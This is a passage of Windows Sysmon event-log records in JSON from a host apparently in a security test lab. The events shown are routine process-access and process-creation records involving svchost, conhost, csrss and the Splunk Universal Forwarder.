05:46:50.906","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2186,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:50.906\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:50.906","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2187,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:50.906\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:50.906","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2188,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:50.906\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:50.906","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2189,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:50.906\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:50.906","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2190,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:50.906\r\nSourceProcessGUID: {A837DB8D-01C6-5F25-0000-0010F1650300}\r\nSourceProcessId: 3776\r\nSourceThreadId: 3796\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-01CA-5F25-0000-0010CEFF0300}\r\nTargetProcessId: 3764\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:50.906","SourceProcessGUID":"{A837DB8D-01C6-5F25-0000-0010F1650300}","SourceProcessId":"3776","SourceThreadId":"3796","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-01CA-5F25-0000-0010CEFF0300}","TargetProcessId":"3764","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:51","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":2191,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:51.018\r\nProcessGuid: {A837DB8D-01CB-5F25-0000-0010CF010400}\r\nProcessId: 3752\r\nImage: C:\\Windows\\System32\\cmd.exe\r\nFileVersion: 10.0.14393.0 (rs1_release.160715-1616)\r\nDescription: Windows Command Processor\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: Cmd.Exe\r\nCommandLine: C:\\Windows\\system32\\cmd.exe /c \"\"C:\\Program Files\\SplunkUniversalForwarder\\etc\\system\\bin\\admon.cmd\" --scheme\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {A837DB8D-01B3-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A\r\nParentProcessGuid: {A837DB8D-01C5-5F25-0000-0010C3C30200}\r\nParentProcessId: 3088\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:46:51.018","ProcessGuid":"{A837DB8D-01CB-5F25-0000-0010CF010400}","Image":"C:\\Windows\\System32\\cmd.exe","FileVersion":"10.0.14393.0 (rs1_release.160715-1616)","Description":"Windows Command Processor","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"Cmd.Exe","CommandLine":"C:\\Windows\\system32\\cmd.exe /c \"\"C:\\Program Files\\SplunkUniversalForwarder\\etc\\system\\bin\\admon.cmd\" --scheme\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{A837DB8D-01B3-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A","ParentProcessGuid":"{A837DB8D-01C5-5F25-0000-0010C3C30200}","ParentProcessId":"3088","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 05:46:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:51","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2192,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:51.016\r\nSourceProcessGUID: {A837DB8D-01C5-5F25-0000-0010C3C30200}\r\nSourceProcessId: 3088\r\nSourceThreadId: 3772\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {A837DB8D-01C6-5F25-0000-0010C1630300}\r\nTargetProcessId: 3752\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7d35e7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7cdcb9|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7ca4ec|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7ca0a3|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7c9f0d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6d7908|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6de2ee|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6b29fa|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6b4274|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+e42dc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ec682|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+e9959|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+d7f31|C:\\Windows\\System32\\sechost.dll+14342|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:51.016","SourceProcessGUID":"{A837DB8D-01C5-5F25-0000-0010C3C30200}","SourceProcessId":"3088","SourceThreadId":"3772","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{A837DB8D-01C6-5F25-0000-0010C1630300}","TargetProcessId":"3752","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7d35e7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7cdcb9|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7ca4ec|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7ca0a3|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7c9f0d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6d7908|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6de2ee|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6b29fa|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6b4274|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+e42dc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ec682|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+e9959|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+d7f31|C:\\Windows\\System32\\sechost.dll+14342|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:51","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2193,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:51.016\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 808\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-01C6-5F25-0000-0010C1630300}\r\nTargetProcessId: 3752\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:51.016","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"808","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-01C6-5F25-0000-0010C1630300}","TargetProcessId":"3752","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:46:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
